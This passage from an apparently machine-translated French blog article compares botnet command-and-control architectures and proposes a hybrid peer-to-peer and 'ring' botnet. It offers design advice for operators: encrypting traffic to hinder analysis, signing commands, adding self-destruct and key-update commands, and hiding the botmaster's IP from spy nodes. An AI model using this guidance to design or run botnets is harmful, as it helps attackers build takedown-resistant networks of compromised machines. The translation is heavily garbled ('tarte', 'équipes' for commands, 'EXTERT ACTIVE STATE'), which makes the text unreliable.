  • Pour donner une commande à un nœud spécifique, vous devez l'envoyer directement dans l'ensemble du réseau ou vous connecter directement au nœud.
  • Bots réactifs lents pour les équipes.
  • Pour envoyer une commande "longue", par exemple, avec une liste d'URL, vous devez utiliser un serveur tiers, sinon les robots ralentissent encore plus.
  • Botmaster est plus facile à trouver que dans l'exemple précédent, en raison de l'utilisation de n'importe quel serveur.

Bien sûr, je me trompe peut-être, mais à mon avis, les p2p-botnets sont bien pires que la tarte. Peut-être que des fabricants d'antivirus à propos de quelque chose de silencieux?

5. Solution complète

Une façon d'inventer quelque chose de nouveau et de bien - traversé quelque chose de vieux. Combiné le téléphone, l'ordinateur, le magnétophone, la caméra et le caméscope - obtenu téléphone intelligent . Personne ne sera surpris par l'ordinateur et le contrôle du climat dans la voiture. Nous collez à chaque aimant de yaourt au réfrigérateur et la vente décolle.

Il est important de se rappeler qu'avec le croisement infructueux, nous ne pouvons rien obtenir à rien. Rappeler algorithmes génétiques , vérité? Prenez-le apparemment bonne idée - P2P-Botnet, où l'attaque est responsable de l'affectation de voisins. Ensuite, nous n'avons besoin d'aucun serveur!

Mais dans ce cas, la complexité de la mise en œuvre augmentera, même légèrement. Les problèmes de p2p de p2p restants resteront non résolus. Gagner est insignifiant, compte 1: 1.

Certains assis avec un morceau de papier et un crayon, j'ai donné naissance à l'idée suivante. Autant que je sache, elle n'avait jamais été exprimée auparavant, et je suis le premier qui est venu avec. CHSV Plus 100.

Que si le réseau a deux États - "actif" et "passif". En état passif, Botnet fonctionne selon le schéma P2P. Botmaster envoie la commande à "mobiliser des troupes" et le réseau se transforme en mille. Dans son équipe, le Botmaster doit spécifier les nœuds de la tournée et le temps auquel le réseau change de condition. Pour que la bague était plus, vous pouvez donner une équipe à plusieurs robots pour appeler vos voisins. En outre, toutes les commandes sont transmises par la visite. Il est responsable de la nomination des nouveaux nœuds "voisins". Si les anneaux TTL se révèlent plus tard être suffisants, vous pouvez donner la commande "EXTERT ACTIVE STATE".

Un tel botnet n'hérite pas un seul réseau P2P moins et aura tous les avantages de la tarte, ainsi que:

  • Augmentation de la stabilité aux attaques DDO et aux filtres réseau, comme le réseau P2P.
  • Consommation de ressources minimale par des bots pendant les temps d'arrêt du réseau. Botmaster n'a pas besoin de suivre le statut de la TARTE et de choisir de nouveaux nœuds pour lui.
  • Lors de la création de l'auto, seuls les nœuds sont sélectionnés actuellement en ligne. Les robots seront connectés à la bague de la première tentative (pendant un moment).
  • La liste des "voisins" est périodiquement mise à jour. Tous les mêmes nœuds IP inclus dans la bague temporaire connaissent tout le botnet. Laissez donc ces nœuds considèrent ces nœuds, si une partie des vrais voisins n'a pas été apparue sur le réseau pendant une longue période.

Et le seul inconvénient que je vois ici est la complexité de la mise en œuvre. Mais ce n'est pas vraiment un problème.

6. Quel est important de se rappeler

Jusqu'à présent, je me taise sur certains points, car ils sont inhérents à l'un des noms des méthodes de contrôle Botnet. L'attention devrait être concentrée sur eux.

  • Une partie des nœuds ne peut pas recevoir de connexions entrantes en raison du pare-feu ou du NAT. Au minimum, il est nécessaire de prendre en compte lors de la rédaction d'un bot. Par exemple, lors de la distribution de commandes dans le réseau P2P, le bot doit pouvoir accéder périodiquement aux voisins lui-même et ne pas attendre l'équipe d'eux.
  • Il convient de procéder au fait que toutes les commandes envoyées par les réseaux sont écoutées. Au minimum, la personne intéressée peut modifier le code de BOT à ces fins. Néanmoins, ça a du sens chiffrer tout le trafic transmis sur le réseau. Au minimum, il compliquera l'analyse du botnet.
  • Tous les commandes Botmaster doivent s'abonner signature numérique . Les mots de passe ne conviennent pas, car ils peuvent être interceptés.
  • Une fois que cela s'est produit sur la mise en œuvre, je note que au moins trois équipes devraient être fournies dans n'importe quel Botnet - la mise à jour de Botmaster, la mise à jour de la clé Botmaster et l'autodestruction de l'ensemble du réseau.
  • Le réseau a des nœuds "spyware". Certains d'entre eux sont inclus dans la tournée. Dans le même temps, nous ne connaissons pas les objectifs que ces "espions" sont poursuivies - cela peut être la définition de la propriété intellectuelle de Botmaster, ce qui enfreint l'exécution des équipes, la construction du réseau, l'obtention de contrôle sur Botnet et ainsi de suite. Cela signifie notamment que les robots doivent choisir un nœud aléatoire lors de la connexion à la bague et de ne pas utiliser tout le temps de la même manière.
  • Sur la figure, les nœuds de Addstration sont connectés chacun avec chacun, mais beaucoup plus pratiques pour réaliser la bague sous la forme d'un petit réseau P2P, c'est-à-dire en fonction du principe "voisins".

Je note également que les solutions 1 et 2 (serveur, de nombreux serveurs) sont privées de nombreux minus et reçoivent quelques avantages de la résolution de 3 (confiance) lors de l'utilisation du protocole HTTP. Faites défiler ces articles à nouveau pour comprendre ce que je suis.

7. Conclusions

Pour les petits réseaux bonne décision est l'utilisation de l'IRC. Par exemple, si vous souhaitez créer votre petit réseau pour l'informatique distribuée, installez le bot sur ordinateur de famille, ordinateur portable, netbook, ordinateur de travail (s'il permet la stratégie de la société) et gérer le réseau via Dalnet. Si vous avez besoin, plus tard, le réseau peut être "pompant" à la tarte. Vous poursuivez la commande appropriée, non?

Si une jolie interface Web est nécessaire au botnet, il peut être logique d'écrire programme supplémentairequi prendront des commandes d'un serveur Web et les envoyer à IRC. Au moins considérer cette approche.

SOLUTIONS UNIVERSES - Ceci est une excursion et une tresting P2P +. De tels réseaux fonctionneront parfaitement quel que soit le nombre de nœuds d'entre eux, 1 ou 1 000 000, sans aucun serveur.

Compte tenu de la présence de lacunes évidentes dans le "pure p2p" par rapport à la bague, il reste peu clair pourquoi il est considéré comme une bonne solution. Sûrement dans les bots dont le réseau consiste, il y en a beaucoup caractéristiques utiles. Pourquoi ne pas ajouter une autre petite charge utile - mobiliser le réseau dans la tournée?

Ici, peut-être, tous. Je serai heureux de tout ce que vos commentaires. Surtout avec la critique, les instructions sur les inexactitudes / contradictions dans le texte et vos idées sur le sujet surélevé.

La cloche.

Il y a ceux qui ont lu cette nouvelle devant vous.
Abonnez-vous pour recevoir des articles frais.
E-mail
Nom
Nom de famille
Comment voulez-vous lire la cloche
Sans spam